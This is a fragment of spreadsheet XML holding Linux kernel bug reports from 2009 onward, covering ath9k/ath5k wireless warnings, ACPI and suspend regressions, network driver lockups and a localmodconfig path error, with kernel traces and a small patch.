  <si>
    <t>lijun</t>
  </si>
  <si>
    <t>2012-06-18 12:38 UTC</t>
  </si>
  <si>
    <t>after a long time (server days test),just run a simple putchar/getchar app . the serial will dead after print"serial8250: too much work for ... " but will recover after echo t &gt;/proc/sysrq-triger though the ssh(network). ---------------------------------------- alinux-suse10 ~ # 1000 -bash: 1000: command not found dopralinux-suse10 ~ # testAllFun Pls input your choice :1000 Pls input your choice : exit successfully...^_^... dopralinux-suse10 ~ # dopralinux-suse10 ~ # testAllFun Pls input your choice :1000 Pls input your choice : exit successfully...^_^... dopralinux-suse10 ~ # dopralinux-suse10 ~ # testAllFun Pls input your choice : -----------------------------------------------</t>
  </si>
  <si>
    <t>ath9k txpower configuration only takes effect after scan</t>
  </si>
  <si>
    <t>2.6.32-rc7-wl</t>
  </si>
  <si>
    <t>2009-11-19 19:20 UTC</t>
  </si>
  <si>
    <t>Javier Cardona</t>
  </si>
  <si>
    <t>2010-04-16 18:26 UTC</t>
  </si>
  <si>
    <t>Changing the transmission power while the interface is up and associated has no effect. The following sequence of commands will not affect the output power (verified with a sniffer): # iwconfig wlan0 txpower 20dbm # iwconfig wlan0 wlan0 IEEE 802.11abgn ESSID:"cozyguest" Mode:Managed Frequency:2.462 GHz Access Point: 00:13:10:XX:XX:XX Bit Rate=54 Mb/s Tx-Power=20 dBm ... # iwconfig wlan0 txpower 0dbm # iwconfig wlan0 wlan0 IEEE 802.11abgn ESSID:"cozyguest" Mode:Managed Frequency:2.462 GHz Access Point: 00:13:10:XX:XX:XX Bit Rate=54 Mb/s Tx-Power=0 dBm ... The changes will take effect if the interface is brought down and up or if a scan is issued. Some notes that may be useful to fix this: After mac80211 sets IEEE80211_CONF_CHANGE_POWER the driver updates sc-&gt;config.txpowlimit. The new value is sent to the card by ath_update_txpow() which is only called by: 1 364 drivers/net/wireless/ath/ath9k/main.c &lt;&lt;ath_set_channel&gt;&gt; ath_update_txpow(sc); 2 1230 drivers/net/wireless/ath/ath9k/main.c &lt;&lt;ath_radio_enable&gt;&gt; ath_update_txpow(sc); 3 2021 drivers/net/wireless/ath/ath9k/main.c &lt;&lt;ath_reset&gt;&gt; ath_update_txpow(sc); 4 2330 drivers/net/wireless/ath/ath9k/main.c &lt;&lt;ath9k_start&gt;&gt; ath_update_txpow(sc); The new power settings only take effect if one triggers one of these functions, for instance by issuing a scan. Don't have a fix at this time. The obvious fix did not solve the problem: diff --git a/drivers/net/wireless/ath/ath9k/main.c b/drivers/net/wireless/ath/ath9k/main.c index 16bdb1b..b62012e 100644 --- a/drivers/net/wireless/ath/ath9k/main.c +++ b/drivers/net/wireless/ath/ath9k/main.c @@ -2795,8 +2795,10 @@ static int ath9k_config(struct ieee80211_hw *hw, u32 changed) } skip_chan_change: - if (changed &amp; IEEE80211_CONF_CHANGE_POWER) + if (changed &amp; IEEE80211_CONF_CHANGE_POWER) { sc-&gt;config.txpowlimit = 2 * conf-&gt;power_level; + ath_update_txpow(sc); + } spin_lock_bh(&amp;sc-&gt;wiphy_lock); disable_radio = ath9k_all_wiphys_idle(sc); But issuing a scan after changing the power did: # iwconfig wlan0 txpower 10dbm; iw dev wlan0 scan ( Scanning seems to be the magic word that one must invoke to get things done on ath9k: See also bug 14187 )</t>
  </si>
  <si>
    <t>PROBLEM: system locking when burning dvd with an externel usb dvd writer</t>
  </si>
  <si>
    <t>Linux version 2.6.32-rc8-00011-ga8a8a66-dirty</t>
  </si>
  <si>
    <t>2009-11-20 11:11 UTC</t>
  </si>
  <si>
    <t>Laurent Carlier</t>
  </si>
  <si>
    <t>2012-06-18 12:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 23840 [details] dmesg output When i try to burn a dvd with an externel dvd writer (usb), i've got system freeze during sometime then burning dvd fail. System : archlinux x86_64 Cpu : AMD Athlon(tm) II X4 630 Processor</t>
  </si>
  <si>
    <t>Got a warning when ath9k running as AP</t>
  </si>
  <si>
    <t>2.6.30-bpo.1-686-bigmem</t>
  </si>
  <si>
    <t>2009-11-20 14:06 UTC</t>
  </si>
  <si>
    <t>frederic</t>
  </si>
  <si>
    <t>2012-06-18 12:40 UTC</t>
  </si>
  <si>
    <t>My PCI WiFi card is installed as AP, lspci shows: Network controller: Atheros Communications Inc. Device 0029 (rev 01) Subsystem: Atheros Communications Inc. Device 2093 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 168, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at fddf0000 (32-bit, non-prefetchable) [size=64K] Capabilities: [44] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=100mA PME(D0+,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Kernel driver in use: ath9k Kernel modules: ath9k I'm using hostapd to set up the AP. I'm using version 2.6.32-rc7 stable as ath9k driver. In dmesg (debug of ath9k) this is printed: [151191.797087] ------------[ cut here ]------------ [151191.797110] WARNING: at /work/wifi/compat-wireless-2.6.32-rc7/net/mac80211/rx.c:2486 ieee80211_rx+0xdf/0x579 [mac80211]() [151191.797113] Hardware name: Crestline [151191.797114] Modules linked in: ath9k mac80211 ath cfg80211 rfkill_backport rfcomm l2cap loop arc4 ecb evdev led_class serio_raw snd_pcsp i2c_i801 i2c_core iTCO_wdt snd_hda_codec_realtek btusb asix usbnet mii bluetooth rt73 processor button snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore snd_page_alloc intel_agp agpgart ext3 jbd mbcache ide_gd_mod ata_generic ata_piix libata scsi_mod piix ide_pci_generic ide_core ehci_hcd uhci_hcd usbcore thermal fan thermal_sys [last unloaded: rfkill_backport] [151191.797162] Pid: 1082, comm: ffmpeg-0.5 Tainted: G W 2.6.30-bpo.1-686-bigmem #1 [151191.797165] Call Trace: [151191.797171] [&lt;c012c79c&gt;] ? warn_slowpath_common+0x5e/0x8a [151191.797175] [&lt;c012c7d2&gt;] ? warn_slowpath_null+0xa/0xc [151191.797188] [&lt;f8aa4382&gt;] ? ieee80211_rx+0xdf/0x579 [mac80211] [151191.797203] [&lt;f8bba362&gt;] ? ath_rx_tasklet+0x813/0x85e [ath9k] [151191.797207] [&lt;c0161a77&gt;] ? handle_fasteoi_irq+0x90/0x97 [151191.797211] [&lt;c0108080&gt;] ? xen_do_upcall+0x0/0xc [151191.797214] [&lt;c0130a5a&gt;] ? irq_exit+0x31/0x53 [151191.797217] [&lt;c0109002&gt;] ? do_IRQ+0x65/0x76 [151191.797227] [&lt;f82bec0f&gt;] ? ehci_watchdog+0x0/0x37 [ehci_hcd] [151191.797230] [&lt;c0107c49&gt;] ? common_interrupt+0x29/0x30 [151191.797242] [&lt;f8bb87f1&gt;] ? ath9k_tasklet+0x44/0xbf [ath9k] [151191.797245] [&lt;c013038f&gt;] ? tasklet_action+0x63/0xa8 [151191.797249] [&lt;c0130897&gt;] ? __do_softirq+0x8e/0x135 [151191.797252] [&lt;c013096c&gt;] ? do_softirq+0x2e/0x38 [151191.797255] [&lt;c0130a4f&gt;] ? irq_exit+0x26/0x53 [151191.797257] [&lt;c0109002&gt;] ? do_IRQ+0x65/0x76 [151191.797260] [&lt;c0107c49&gt;] ? common_interrupt+0x29/0x30 [151191.797263] ---[ end trace 54b419758ff7dbbb ]--- [151418.421793] ath9k: DMA failed to stop in 10 ms AR_CR=0x00000024 AR_DIAG_SW=0x40000020 [157047.064720] ------------[ cut here ]------------ [157047.064752] WARNING: at /work/wifi/compat-wireless-2.6.32-rc7/net/mac80211/rx.c:2486 ieee80211_rx+0xdf/0x579 [mac80211]() [157047.064757] Hardware name: Crestline [157047.064760] Modules linked in: ath9k mac80211 ath cfg80211 rfkill_backport rfcomm l2cap loop arc4 ecb evdev led_class serio_raw snd_pcsp i2c_i801 i2c_core iTCO_wdt snd_hda_codec_realtek btusb asix usbnet mii bluetooth rt73 processor button snd_hda_intel snd_hda_codec snd_hwdep snd_pcm snd_timer snd soundcore snd_page_alloc intel_agp agpgart ext3 jbd mbcache ide_gd_mod ata_generic ata_piix libata scsi_mod piix ide_pci_generic ide_core ehci_hcd uhci_hcd usbcore thermal fan thermal_sys [last unloaded: rfkill_backport] [157047.064833] Pid: 0, comm: swapper Tainted: G W 2.6.30-bpo.1-686-bigmem #1 [157047.064835] Call Trace: [157047.064842] [&lt;c012c79c&gt;] ? warn_slowpath_common+0x5e/0x8a [157047.064845] [&lt;c012c7d2&gt;] ? warn_slowpath_null+0xa/0xc [157047.064859] [&lt;f8aa4382&gt;] ? ieee80211_rx+0xdf/0x579 [mac80211] [157047.064872] [&lt;f8bb9ace&gt;] ? ath_rx_send_to_mac80211+0x94/0xa2 [ath9k] [157047.064884] [&lt;f8bba362&gt;] ? ath_rx_tasklet+0x813/0x85e [ath9k] [157047.064889] [&lt;c01461f4&gt;] ? tick_dev_program_event+0x1e/0x81 [157047.064901] [&lt;f8bb87f1&gt;] ? ath9k_tasklet+0x44/0xbf [ath9k] [157047.064904] [&lt;c013038f&gt;] ? tasklet_action+0x63/0xa8 [157047.064907] [&lt;c0130897&gt;] ? __do_softirq+0x8e/0x135 [157047.064910] [&lt;c013096c&gt;] ? do_softirq+0x2e/0x38 [157047.064913] [&lt;c0130a4f&gt;] ? irq_exit+0x26/0x53 [157047.064917] [&lt;c0109002&gt;] ? do_IRQ+0x65/0x76 [157047.064920] [&lt;c0107c49&gt;] ? common_interrupt+0x29/0x30 [157047.064923] [&lt;c010d1a9&gt;] ? mwait_idle+0x67/0x83 [157047.064928] [&lt;c010691a&gt;] ? cpu_idle+0x46/0x60 [157047.064933] [&lt;c045877e&gt;] ? start_kernel+0x2c2/0x2c5 [157047.064935] ---[ end trace 54b419758ff7dbbc ]--- [159053.727654] ath9k: DMA failed to stop in 10 ms AR_CR=0x00000024 AR_DIAG_SW=0x40000020 But everything seems to be working after these warnings.</t>
  </si>
  <si>
    <t>Regression in efi.c</t>
  </si>
  <si>
    <t>2009-11-21 14:50 UTC</t>
  </si>
  <si>
    <t>2010-12-18 00:47 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in efi.c 2.6.32-rc7 Submitter : indexer &lt;indexer@internode.on.net&gt; Date : 2009-11-17 14:54 References : http://marc.info/?l=linux-kernel&amp;m=125846988820120&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>bisected 2.6.32 EC regression - Temperatures not correctly detected after suspend</t>
  </si>
  <si>
    <t>2.6.32-rc8</t>
  </si>
  <si>
    <t>2009-11-22 20:42 UTC</t>
  </si>
  <si>
    <t>Federico Chiacchiaretta</t>
  </si>
  <si>
    <t>2011-03-24 03:47 UTC</t>
  </si>
  <si>
    <t>14735 15425</t>
  </si>
  <si>
    <t>Hi I'm experiencing this problem on my dell laptop: on first boot temperatures are correctly detected, fan starts correctly when temperature goes up. If I suspend (to ram) the laptop and then resume, I get zero values by all three thermal zones (0 °C), and fan never starts, I have to reboot to fix this. I'm using kernel 2.6.32-rc8 from http://kernel.ubuntu.com/~kernel-ppa/mainline/v2.6.32-rc8/ , which AFAIK is kernel vanilla compiled for ubuntu. I also tried to build kernel with zen patchset (version 2.6.32-rc7) and the issue is present as well. Best Regards Federico Chiacchiaretta</t>
  </si>
  <si>
    <t>Resume from disk hangs in acpi_ex_acquire_global_lock</t>
  </si>
  <si>
    <t>2009-11-22 21:25 UTC</t>
  </si>
  <si>
    <t>2010-06-09 04:37 UTC</t>
  </si>
  <si>
    <t>I found out that my system will occasionally fail when resuming from hibernation. Common denominator was that attempt to acquire global acpi lock failed. According to the source, this lock is only used on access to fields of 'OperationRegion's that have 'Lock' attribute, or in other simpler words, this lock protects access to device registers. My notebook has: OperationRegion (NVST, SystemMemory, 0x7FEBCE89, 0x00000063) Field (NVST, AnyAcc, Lock, Preserve) OperationRegion (RCRB, SystemMemory, 0xFED1C000, 0x4000) Field (RCRB, DWordAcc, Lock, Preserve) OperationRegion (ERAM, EmbeddedControl, 0x00, 0xFF) Field (ERAM, ByteAcc, Lock, Preserve) NVST is in memory, containing some bios flags. It is used in some places. RCRB is a BAR of southbridge, and used I think for pcie hotplug. I know that because I mapped all unknown memory ranges using intel docs. (Southbridge/LPC configuration (Root Complex Base Address)) I don't thing that access to these registers hangs in the middle. However, the last third register, looks very suspicions, 'cause its the EC. In fact system hangs, while it tries to read from this range. But it hangs because it can't take the lock, and I suspect that this is due to access to same range. So, ether global lock isn't released during suspend, or first attempt to touch EC stalls. Note that I don't see EC GPE storms warning anymore lately, so EC operates in interrupt mode. For testing, I removed this global lock, and then I did ~230 s2disk cycles, using /sys/power/disk directly, and 'reboot' method. Then, I did the full test that is ~130 cycles using 'platform' method, pm_hibernate, and using rtc alarm to wake the system. I couldn't make the system hang.</t>
  </si>
  <si>
    <t>i915: playing video via XVideo extension makes the screen flicker</t>
  </si>
  <si>
    <t>2.6.32-rc8-00011-ga8a8a66</t>
  </si>
  <si>
    <t>2009-11-23 13:15 UTC</t>
  </si>
  <si>
    <t>2010-02-07 22:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 23881 [details] config used i915: playing video via XVideo extension makes the screen flicker The video doesn't seems to appear at all. But the whole screen starts to flicker. Restarting the X server via "pkill gdm", seems to start the X server normally again. But I still cannot play videos.</t>
  </si>
  <si>
    <t>Flooded by do_IRQ: 0.91 No irq handler for vector (irq -1) messages</t>
  </si>
  <si>
    <t>2.6.31.5-127 fedora 12</t>
  </si>
  <si>
    <t>2009-11-24 14:54 UTC</t>
  </si>
  <si>
    <t>Tata Calu</t>
  </si>
  <si>
    <t>2012-06-14 15:57 UTC</t>
  </si>
  <si>
    <t>The terminal is being flooded by messages like this: Message from syslogd@localhost at Nov 24 16:43:27 ... kernel:do_IRQ: 0.91 No irq handler for vector (irq -1) This makes the terminal/CLI unusable. I receive about 100-300 messages like the one above every minute and I cannot identify the problem. ps: this is my first bug report on the linux kernel, if there are things I omitted, please tell me.</t>
  </si>
  <si>
    <t>WARNING: at drivers/net/wireless/ath/ath5k/base.c:1142 ath5k_tasklet_rx+0x47a/0x5f0</t>
  </si>
  <si>
    <t>2.6.32.2</t>
  </si>
  <si>
    <t>2009-11-25 04:59 UTC</t>
  </si>
  <si>
    <t>Nicolas Stransky</t>
  </si>
  <si>
    <t>2010-03-04 15:25 UTC</t>
  </si>
  <si>
    <t>Created attachment 23926 [details] boot dmesg Hi, Since 2.6.32-rc8 I observe the following in my dmesg: WARNING: at drivers/net/wireless/ath/ath5k/base.c:1142 ath5k_tasklet_rx+0x47a/0x5f0 [ath5k]() Hardware name: 2007WS4 invalid hw_rix: 1b Modules linked in: vboxnetadp vboxnetflt vboxdrv usb_storage tun sco bridge stp llc bnep acpi_cpufreq cpufreq_powersave binfmt_misc uinput fuse hdaps tp_smapi thinkpad_ec cpufreq_stats cpufreq_ondemand freq_table loop dm_mod btusb snd_hda_codec_analog snd_hda_intel snd_hda_codec snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_midi uhci_hcd snd_rawmidi snd_seq_midi_event snd_seq pcmcia snd_timer snd_seq_device ath5k snd psmouse ehci_hcd ath yenta_socket soundcore snd_page_alloc rsrc_nonstatic serio_raw usbcore evdev pcmcia_core Pid: 14069, comm: rhythmbox Tainted: G W 2.6.32-rc8 #1 Call Trace: [&lt;f8889d1a&gt;] ? ath5k_tasklet_rx+0x47a/0x5f0 [ath5k] [&lt;f8889d1a&gt;] ? ath5k_tasklet_rx+0x47a/0x5f0 [ath5k] [&lt;c1034a2c&gt;] warn_slowpath_common+0x6c/0xc0 [&lt;f8889d1a&gt;] ? ath5k_tasklet_rx+0x47a/0x5f0 [ath5k] [&lt;c1034ac6&gt;] warn_slowpath_fmt+0x26/0x30 [&lt;f8889d1a&gt;] ath5k_tasklet_rx+0x47a/0x5f0 [ath5k] [&lt;c149615a&gt;] ? ieee80211_wake_queues+0xa/0x10 [&lt;c1039803&gt;] tasklet_action+0x83/0x100 [&lt;c1039f42&gt;] __do_softirq+0xa2/0x130 [&lt;c101b976&gt;] ? ack_apic_level+0x66/0x170 [&lt;c1069ad6&gt;] ? handle_IRQ_event+0x36/0xe0 [&lt;c103a015&gt;] do_softirq+0x45/0x50 [&lt;c103a215&gt;] irq_exit+0x65/0x80 [&lt;c1005a44&gt;] do_IRQ+0x54/0xc0 [&lt;c1004129&gt;] common_interrupt+0x29/0x30 [&lt;c103007b&gt;] ? push_rt_task+0x9b/0x2a0 [&lt;c101ec2f&gt;] ? read_hpet+0xf/0x20 [&lt;c1052af6&gt;] getnstimeofday+0x56/0x110 [&lt;c1052c01&gt;] do_gettimeofday+0x11/0x40 [&lt;c10394cd&gt;] sys_gettimeofday+0x1d/0x70 [&lt;c1003a90&gt;] sysenter_do_call+0x12/0x2c boot dmesg and config attached. Thanks, Nico</t>
  </si>
  <si>
    <t>Complete NAPI IRQ lockup in b44 driver: code fundamentally incompatible with netconsole requirements</t>
  </si>
  <si>
    <t>2009-11-25 20:15 UTC</t>
  </si>
  <si>
    <t>2012-06-14 15:59 UTC</t>
  </si>
  <si>
    <t>Hi, severity "blocking" (== "Blocks development and/or testing work"): it's my primary window to the world on this router - netconsole - and crashes multiple times when loading various drivers, thus for me there's no productive proceeding possible, plus there have been multiple reports on this issue since at least 2004. The kernel version I'm testing it on is 2.6.30.9 (OpenWrt MIPSEL, on ASUS WL-500gP v2), but since b44 interrupt handler is unchanged I assume it's still unfixed. Frequently when doing some medium activity such as loading modules such as ftdi_sio, usb_audio etc. (especially with kobject debugging enabled), the network LED starts blinking like crazy and when re-listening to netconsole output, there's simply a flood of %s: Error, poll already scheduled and the box is DEAD (again! *curse*). Productive debugging of multiple USB and ftdi_sio issues is simply impossible with this kind of problem remaining. See also: "RE:hostname freeze" (2004!!): http://lists.linuxcoding.com/rhl/2004/msg51048.html "b44 driver suspend/resume (was Re: [ACPI] Re: Re: various problems with Acer TM654, suspend, ACAD, radeon)": http://osdir.com/ml/network.general/2004-08/msg00208.html "acpi and b44: irq disabled, b44: Error, poll already scheduled" (2004!!): http://lkml.indiana.edu/hypermail/linux/kernel/0408.3/0078.html And a very related fix and long discussion is at: "[PATCH 2.6.30-rc4] r8169: avoid losing MSI interrupts": http://kerneltrap.org/mailarchive/linux-netdev/2009/5/23/5791863 I'm very uncertain whether the interrupt handler method of simply screaming this error message on every interrupt without doing any actual remedies is a good idea. HAH! Now I've got it: the fact that we're on netconsole means that this error message gets sent _immediately_ (out to the netconsole device!!), thus this very network transmission encounters an IRQ handler at a time where the previous scheduled NAPI processing had no chance yet of being done, thus napi_schedule_prep() FAIL, thus error message again, thus... ad nauseam! Or, IOW, now I'm _certain_ that it is _NOT_ a good idea to scream this message on every IRQ without doing anything about it. I want to report this issue now to make sure it can get the attention it deserves, but for now I'll try to come up with a bandaid locally (simply silencing the error message) in order to be able to debug the other driver issues mentioned above. Thanks!</t>
  </si>
  <si>
    <t>Broken system because of a bad ACPI commit</t>
  </si>
  <si>
    <t>2009-11-27 12:40 UTC</t>
  </si>
  <si>
    <t>Petri Lehtinen</t>
  </si>
  <si>
    <t>2009-12-17 03:41 UTC</t>
  </si>
  <si>
    <t>After an upgrade to 2.6.31 kernel, the system is very unstable. Sometimes it doesn't boot. If it does, the laptop keyboard doesn't work and after a few minutes it hangs with ATA errors. I bisected this problem down to the following commit: commit ee1ca48fae7e575d5e399d4fdcfe0afc1212a64c Author: Pallipadi, Venkatesh &lt;venkatesh.pallipadi@intel.com&gt; Date: Thu May 21 17:09:10 2009 -0700 ACPI: Disable ARB_DISABLE on platforms where it is not needed ARB_DISABLE is a NOP on all of the recent Intel platforms. For such platforms, reduce contention on c3_lock by skipping the fake ARB_DISABLE. Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@intel.com&gt; Signed-off-by: Len Brown &lt;len.brown@intel.com&gt; With this commit reverted, the system works fine with 2.6.31. $ cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 6 model : 14 model name : Intel(R) Celeron(R) M CPU 410 @ 1.46GHz stepping : 8 cpu MHz : 1463.194 cache size : 1024 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 10 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss tm pbe nx constant_tsc up arch_perfmon bts pni monitor tm2 xtpr pdcm bogomips : 2926.38 clflush size : 64 power management: If I read the code correctly, in the commit message, "all of the recent Intel platforms" seem to mean those with family == 6 and model &gt;= 14. My processor's model is 14 so could we have an off-by-one error here?</t>
  </si>
  <si>
    <t>make localmodconfig can't find lsmod</t>
  </si>
  <si>
    <t>2009-11-27 17:39 UTC</t>
  </si>
  <si>
    <t>2012-06-18 12:47 UTC</t>
  </si>
  <si>
    <t>I got this error when running 'make localmodconfig': $ make localmodconfig using config: '.config' Can't exec "/sbin/lsmod": No such file or directory at scripts/kconfig/streamline_config.pl line 241. Cant lsmod at scripts/kconfig/streamline_config.pl line 241. make[1]: *** [localmodconfig] Error 2 make: *** [localmodconfig] Error 2 It seems the path for lsmod is harcoded to /sbin/lsmod. In my machine (archlinux with module-init-tools 3.11.1) lsmod is installed in /bin/lsmod.</t>
  </si>
  <si>
    <t>8169 hangs box hard under heavy load</t>
  </si>
  <si>
    <t>2009-12-01 01:59 UTC</t>
  </si>
  <si>
    <t>2012-06-18 12:52 UTC</t>
  </si>
  <si>
    <t>I have a box with a realtek8169 as the built in gigabit ethernet. I'm unable to put it under heavy network traffic as if I do the box hangs shortly thereafter. Can be replicated 100% of the time, usually within 2-3 minutes of heavy (network) load. from /v/l/m Nov 22 16:34:33 frank kernel: [28634.284677] The following is only an harmless informational message. Nov 22 16:34:33 frank kernel: [28634.284687] Unless you get a _continuous_flood_ of these messages it means Nov 22 16:34:33 frank kernel: [28634.284693] everything is working fine. Allocations from irqs cannot be Nov 22 16:34:33 frank kernel: [28634.284697] perfectly reliable and the kernel is designed to handle that. Nov 22 16:34:33 frank kernel: [28634.284704] swapper: page allocation failure. order:0, mode:0x20 Nov 22 16:34:33 frank kernel: [28634.284713] Pid: 0, comm: swapper Not tainted 2.6.31.5-0.1-default #1 Nov 22 16:34:33 frank kernel: [28634.284718] Call Trace: Nov 22 16:34:33 frank kernel: [28634.284748] [&lt;ffffffff81011749&gt;] try_stack_unwind+0x189/0x1b0 Nov 22 16:34:33 frank kernel: [28634.284763] [&lt;ffffffff8101013d&gt;] dump_trace+0x9d/0x330 Nov 22 16:34:33 frank kernel: [28634.284776] [&lt;ffffffff81011254&gt;] show_trace_log_lvl+0x64/0x90 Nov 22 16:34:33 frank kernel: [28634.284787] [&lt;ffffffff810112a3&gt;] show_trace+0x23/0x40 Nov 22 16:34:33 frank kernel: [28634.284801] [&lt;ffffffff81554378&gt;] dump_stack+0x81/0x9e Nov 22 16:34:33 frank kernel: [28634.284814] [&lt;ffffffff811110c2&gt;] __alloc_pages_slowpath+0x572/0x580 Nov 22 16:34:33 frank kernel: [28634.284826] [&lt;ffffffff81111221&gt;] __alloc_pages_nodemask+0x151/0x160 Nov 22 16:34:33 frank kernel: [28634.284838] [&lt;ffffffff8114beac&gt;] kmem_getpages+0x6c/0x190 Nov 22 16:34:33 frank kernel: [28634.284850] [&lt;ffffffff8114cfca&gt;] fallback_alloc+0x1ca/0x290 Nov 22 16:34:33 frank kernel: [28634.284861] [&lt;ffffffff8114cd10&gt;] ____cache_alloc_node+0xb0/0x1a0 Nov 22 16:34:33 frank kernel: [28634.284874] [&lt;ffffffff8114c1a2&gt;] kmem_cache_alloc_node+0xa2/0x220 Nov 22 16:34:33 frank kernel: [28634.284885] [&lt;ffffffff8114c39f&gt;] __kmalloc_node+0x7f/0x110 Nov 22 16:34:33 frank kernel: [28634.284898] [&lt;ffffffff81461cf4&gt;] __alloc_skb+0x84/0x1a0 Nov 22 16:34:33 frank kernel: [28634.284910] [&lt;ffffffff81462150&gt;] __netdev_alloc_skb+0x40/0x80 Nov 22 16:34:33 frank kernel: [28634.284936] [&lt;ffffffffa011f0a8&gt;] rtl8169_rx_fill+0xc8/0x280 [r8169] Nov 22 16:34:34 frank kernel: [28634.284966] [&lt;ffffffffa011f63c&gt;] rtl8169_rx_interrupt+0x3dc/0x590 [r8169] Nov 22 16:34:34 frank kernel: [28634.284990] [&lt;ffffffffa0120bca&gt;] rtl8169_poll+0x4a/0x298 [r8169] Nov 22 16:34:34 frank kernel: [28634.285011] [&lt;ffffffff81470b49&gt;] net_rx_action+0x149/0x2e0 Nov 22 16:34:34 frank kernel: [28634.285024] [&lt;ffffffff81076713&gt;] __do_softirq+0xd3/0x240 Nov 22 16:34:34 frank kernel: [28634.285035] [&lt;ffffffff8100d80c&gt;] call_softirq+0x1c/0x30 Nov 22 16:34:34 frank kernel: [28634.285046] [&lt;ffffffff8100f8c5&gt;] do_softirq+0xb5/0x110 Nov 22 16:34:34 frank kernel: [28634.285056] [&lt;ffffffff810763a5&gt;] irq_exit+0xb5/0xd0 Nov 22 16:34:34 frank kernel: [28634.285066] [&lt;ffffffff8100ed1c&gt;] do_IRQ+0x7c/0x100 Nov 22 16:34:34 frank kernel: [28634.285078] [&lt;ffffffff8100d013&gt;] ret_from_intr+0x0/0x11 Nov 22 16:34:34 frank kernel: [28634.285092] [&lt;ffffffff81039766&gt;] native_safe_halt+0x6/0x10 Nov 22 16:34:34 frank kernel: [28634.285107] [&lt;ffffffff810168c2&gt;] default_idle+0x62/0x120 Nov 22 16:34:34 frank kernel: [28634.285119] [&lt;ffffffff81016a42&gt;] c1e_idle+0xc2/0x170 Nov 22 16:34:34 frank kernel: [28634.285129] [&lt;ffffffff8100b44c&gt;] cpu_idle+0xcc/0x120 Nov 22 16:34:34 frank kernel: [28634.285140] [&lt;ffffffff8153da49&gt;] rest_init+0x79/0xa0 Nov 22 16:34:34 frank kernel: [28634.285152] [&lt;ffffffff819e4766&gt;] start_kernel+0x3db/0x3f8 Nov 22 16:34:34 frank kernel: [28634.285165] [&lt;ffffffff819e370d&gt;] x86_64_start_reservations+0x134/0x14f Nov 22 16:34:34 frank kernel: [28634.285176] [&lt;ffffffff819e3883&gt;] x86_64_start_kernel+0x15b/0x17e Nov 22 16:34:34 frank kernel: [28634.285185] Mem-Info: Nov 22 16:34:34 frank kernel: [28634.285189] Node 0 DMA per-cpu: Nov 22 16:34:34 frank kernel: [28634.285196] CPU 0: hi: 0, btch: 1 usd: 0 Nov 22 16:34:34 frank kernel: [28634.285201] CPU 1: hi: 0, btch: 1 usd: 0 Nov 22 16:34:34 frank kernel: [28634.285206] CPU 2: hi: 0, btch: 1 usd: 0 Nov 22 16:34:34 frank kernel: [28634.285210] CPU 3: hi: 0, btch: 1 usd: 0 Nov 22 16:34:34 frank kernel: [28634.285214] Node 0 DMA32 per-cpu: Nov 22 16:34:34 frank kernel: [28634.285220] CPU 0: hi: 186, btch: 31 usd: 170 Nov 22 16:34:34 frank kernel: [28634.285226] CPU 1: hi: 186, btch: 31 usd: 162 Nov 22 16:34:34 frank kernel: [28634.285231] CPU 2: hi: 186, btch: 31 usd: 182 Nov 22 16:34:34 frank kernel: [28634.285235] CPU 3: hi: 186, btch: 31 usd: 178 It sometimes takes longer than 3-5 minutes, but eventually the entire box becomes totally unresponsive. Not even magic sysrq works.</t>
  </si>
  <si>
    <t>usbnet ax88172 mac address change broken</t>
  </si>
  <si>
    <t>2.6.31rc8</t>
  </si>
  <si>
    <t>2009-12-01 15:41 UTC</t>
  </si>
  <si>
    <t>Karsten König</t>
  </si>
  <si>
    <t>2012-06-18 12:55 UTC</t>
  </si>
  <si>
    <t>When changing the MAC address on a NETGEAR FA120 (because an old one is registered with my provider) the replies to the traffic don't reach the system anymore, the NIC is dropping them, putting the NIC into promiscous mode will show they are properly replied to. Searching around I found this patch from the openBSD folks http://www.mail-archive.com/misc@openbsd.org/msg76418.html http://www.openbsd.org/cgi-bin/cvsweb/src/sys/dev/usb/if_axe.c.diff?r1=1.91;r2=1.92 Looks like it is not working with the ax88172, but only with newer models. Still an error message would be nice when setting another physical address</t>
  </si>
  <si>
    <t>HP Compaq 615 laptop doesn't boot starting with kernel 2.6.3x, ssb and 43 fail unless "acpi=off"?</t>
  </si>
  <si>
    <t>2009-12-02 14:27 UTC</t>
  </si>
  <si>
    <t>RJ</t>
  </si>
  <si>
    <t>Created attachment 23996 [details] bootdmesg I'm not sure at selecting component but HP Compaq 615 laptop doesn't work with kernel 2.6.30+ and work fine with &lt;2.6.29. I have tested Fedora 12, Ubuntu 9.10, Mandriva 2010 on it and all of them didn't work. Someone suggested that the problem is in loading pcmcia and pcmcia_core acpi modules because in this laptop we have only Express. Here is the link: http://bbs.archlinux.org/viewtopic.php?id=82052 at #9 #rh https://bugzilla.redhat.com/show_bug.cgi?id=530942 :LP https://bugs.launchpad.net/ubuntu/+source/linux/+bug/454268</t>
  </si>
  <si>
    <t>closing and re-opening the lid does not reactivate the backlight</t>
  </si>
  <si>
    <t>2009-12-03 09:55 UTC</t>
  </si>
  <si>
    <t>2010-01-13 21:51 UTC</t>
  </si>
  <si>
